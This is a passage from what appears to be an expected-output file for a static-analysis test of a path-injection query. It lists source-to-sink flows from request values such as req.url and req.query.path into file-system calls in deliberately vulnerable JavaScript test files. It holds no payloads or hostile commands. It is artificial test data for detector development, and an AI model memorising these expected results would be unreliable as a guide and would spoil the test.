TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:187:38:187:44 | req.url | user-provided value | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:188:51:188:57 | req.url | user-provided value | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:190:44:190:50 | req.url | user-provided value | -| TaintedPath.js:196:31:196:34 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:196:31:196:34 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:197:45:197:48 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:197:45:197:48 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:198:35:198:38 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:198:35:198:38 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:206:29:206:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:202:24:202:30 | req.url | user-provided value | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:213:29:213:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:216:31:216:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | -| express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. | express.js:8:20:8:32 | req.query.bar | user-provided value | -| handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | -| handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | -| normalizedPaths.js:13:19:13:22 | path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:13:19:13:22 | path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:14:19:14:29 | './' + path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:14:19:14:29 | './' + path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:15:19:15:38 | path + '/index.html' | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:15:19:15:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:16:19:16:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:17:19:17:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:23:19:23:22 | path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:23:19:23:22 | path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:24:19:24:29 | './' + path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:24:19:24:29 | './' + path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:25:19:25:38 | path + '/index.html' | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:25:19:25:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:26:19:26:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:27:19:27:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:36:19:36:22 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:36:19:36:22 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | -| normalizedPaths.js:41:21:41:24 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:41:21:41:24 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | -| normalizedPaths.js:59:19:59:22 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:59:19:59:22 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | -| normalizedPaths.js:63:19:63:38 | path + "/index.html" | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:63:19:63:38 | path + "/index.html" | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | -| normalizedPaths.js:68:21:68:24 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:68:21:68:24 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | -| normalizedPaths.js:78:22:78:25 | path | normalizedPaths.js:73:42:73:55 | req.query.path | normalizedPaths.js:78:22:78:25 | path | This path depends on a $@. | normalizedPaths.js:73:42:73:55 | req.query.path | user-provided value | -| normalizedPaths.js:87:29:87:32 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:87:29:87:32 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | -| normalizedPaths.js:90:31:90:34 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:90:31:90:34 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | -| normalizedPaths.js:99:29:99:32 | path | normalizedPaths.js:94:35:94:48 | req.query.path | normalizedPaths.js:99:29:99:32 | path | This path depends on a $@. | normalizedPaths.js:94:35:94:48 | req.query.path | user-provided value | -| normalizedPaths.js:119:19:119:22 | path | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:119:19:119:22 | path | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | -| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:120:19:120:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | -| normalizedPaths.js:135:21:135:24 | path | normalizedPaths.js:130:35:130:48 | req.query.path | normalizedPaths.js:135:21:135:24 | path | This path depends on a $@. | normalizedPaths.js:130:35:130:48 | req.query.path | user-provided value | -| normalizedPaths.js:144:21:144:24 | path | normalizedPaths.js:139:48:139:61 | req.query.path | normalizedPaths.js:144:21:144:24 | path | This path depends on a $@. | normalizedPaths.js:139:48:139:61 | req.query.path | user-provided value | -| normalizedPaths.js:151:21:151:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:151:21:151:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | -| normalizedPaths.js:153:21:153:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:153:21:153:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | -| normalizedPaths.js:165:19:165:22 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:165:19:165:22 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | -| normalizedPaths.js:170:21:170:24 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:170:21:170:24 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | -| normalizedPaths.js:184:19:184:22 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:184:19:184:22 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:187:21:187:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:187:21:187:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:189:21:189:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:189:21:189:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:192:21:192:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:192:21:192:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:194:21:194:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:194:21:194:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:199:21:199:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:199:21:199:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:205:21:205:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:205:21:205:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:208:21:208:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:208:21:208:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:210:21:210:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:210:21:210:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:222:21:222:24 | path | normalizedPaths.js:214:35:214:48 | req.query.path | normalizedPaths.js:222:21:222:24 | path | This path depends on a $@. | normalizedPaths.js:214:35:214:48 | req.query.path | user-provided value | -| normalizedPaths.js:228:21:228:24 | path | normalizedPaths.js:226:35:226:48 | req.query.path | normalizedPaths.js:228:21:228:24 | path | This path depends on a $@. | normalizedPaths.js:226:35:226:48 | req.query.path | user-provided value | -| normalizedPaths.js:238:19:238:22 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:238:19:238:22 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | -| normalizedPaths.js:245:21:245:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:245:21:245:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | -| normalizedPaths.js:250:21:250:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:250:21:250:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | -| normalizedPaths.js:256:19:256:22 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:256:19:256:22 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:262:21:262:24 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:262:21:262:24 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:270:21:270:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:270:21:270:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:278:21:278:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:278:21:278:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:286:21:286:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:286:21:286:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:296:21:296:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:296:21:296:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:304:18:304:21 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:304:18:304:21 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:309:19:309:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:309:19:309:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:313:19:313:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:313:19:313:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:316:19:316:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:316:19:316:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:325:19:325:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:325:19:325:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:332:19:332:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:332:19:332:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:341:18:341:21 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:341:18:341:21 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | -| normalizedPaths.js:346:19:346:22 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:346:19:346:22 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | -| normalizedPaths.js:356:19:356:22 | path | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:356:19:356:22 | path | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | -| normalizedPaths.js:363:21:363:31 | requestPath | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:363:21:363:31 | requestPath | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | -| normalizedPaths.js:379:19:379:22 | path | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:379:19:379:22 | path | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | -| normalizedPaths.js:381:19:381:29 | slash(path) | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:381:19:381:29 | slash(path) | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | -| normalizedPaths.js:388:19:388:22 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:388:19:388:22 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | -| normalizedPaths.js:399:21:399:24 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:399:21:399:24 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | -| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | normalizedPaths.js:407:45:407:55 | req.query.x | normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:407:45:407:55 | req.query.x | user-provided value | -| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | normalizedPaths.js:408:38:408:48 | req.query.x | normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:408:38:408:48 | req.query.x | user-provided value | -| normalizedPaths.js:415:19:415:22 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:415:19:415:22 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | -| normalizedPaths.js:426:21:426:24 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:426:21:426:24 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | -| other-fs-libraries.js:11:19:11:22 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:11:19:11:22 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:12:27:12:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:12:27:12:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:13:24:13:27 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:13:24:13:27 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:14:27:14:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:14:27:14:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:16:34:16:37 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:16:34:16:37 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:17:35:17:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:17:35:17:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:19:56:19:59 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:19:56:19:59 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:24:35:24:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:24:35:24:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:40:35:40:38 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:40:35:40:38 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | -| other-fs-libraries.js:41:50:41:53 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:41:50:41:53 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | -| other-fs-libraries.js:42:53:42:56 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:42:53:42:56 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | -| other-fs-libraries.js:51:19:51:22 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:51:19:51:22 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:52:24:52:27 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:52:24:52:27 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:54:36:54:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:54:36:54:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:55:36:55:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:55:36:55:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:57:46:57:49 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:57:46:57:49 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:59:39:59:42 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:59:39:59:42 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:62:43:62:46 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:62:43:62:46 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:63:51:63:54 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:63:51:63:54 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:70:19:70:22 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:70:19:70:22 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:71:10:71:13 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:71:10:71:13 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:72:15:72:18 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:72:15:72:18 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:76:19:76:19 | x | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:76:19:76:19 | x | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:83:16:83:19 | path | other-fs-libraries.js:81:24:81:30 | req.url | other-fs-libraries.js:83:16:83:19 | path | This path depends on a $@. | other-fs-libraries.js:81:24:81:30 | req.url | user-provided value | -| prettier.js:7:28:7:28 | p | prettier.js:6:13:6:13 | p | prettier.js:7:28:7:28 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | -| prettier.js:11:44:11:44 | p | prettier.js:6:13:6:13 | p | prettier.js:11:44:11:44 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | -| pupeteer.js:9:28:9:34 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:9:28:9:34 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | -| pupeteer.js:13:37:13:43 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:13:37:13:43 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | -| sharedlib-repro.js:22:18:22:25 | filepath | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | sharedlib-repro.js:22:18:22:25 | filepath | This path depends on a $@. | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | user-provided value | -| tainted-access-paths.js:8:19:8:22 | path | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:8:19:8:22 | path | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:12:19:12:25 | obj.sub | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:12:19:12:25 | obj.sub | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:26:19:26:26 | obj.sub3 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:26:19:26:26 | obj.sub3 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:29:21:29:28 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:29:21:29:28 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:30:23:30:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:30:23:30:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:31:23:31:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:31:23:31:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:40:23:40:26 | path | tainted-access-paths.js:39:24:39:30 | req.url | tainted-access-paths.js:40:23:40:26 | path | This path depends on a $@. | tainted-access-paths.js:39:24:39:30 | req.url | user-provided value | -| tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | -| tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | This path depends on a $@. | tainted-require.js:7:19:7:37 | req.param("module") | user-provided value | -| tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | This path depends on a $@. | tainted-require.js:12:29:12:47 | req.param("module") | user-provided value | -| tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | This path depends on a $@. | tainted-require.js:14:11:14:29 | req.param("module") | user-provided value | -| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:18:43:18:58 | req.param("dir") | user-provided value | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:24:37:24:48 | req.params.x | user-provided value | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:25:34:25:45 | req.params.x | user-provided value | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:33:37:33:48 | req.params.x | user-provided value | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:35:34:35:45 | req.params.x | user-provided value | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:38:43:38:58 | req.param("dir") | user-provided value | -| tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | 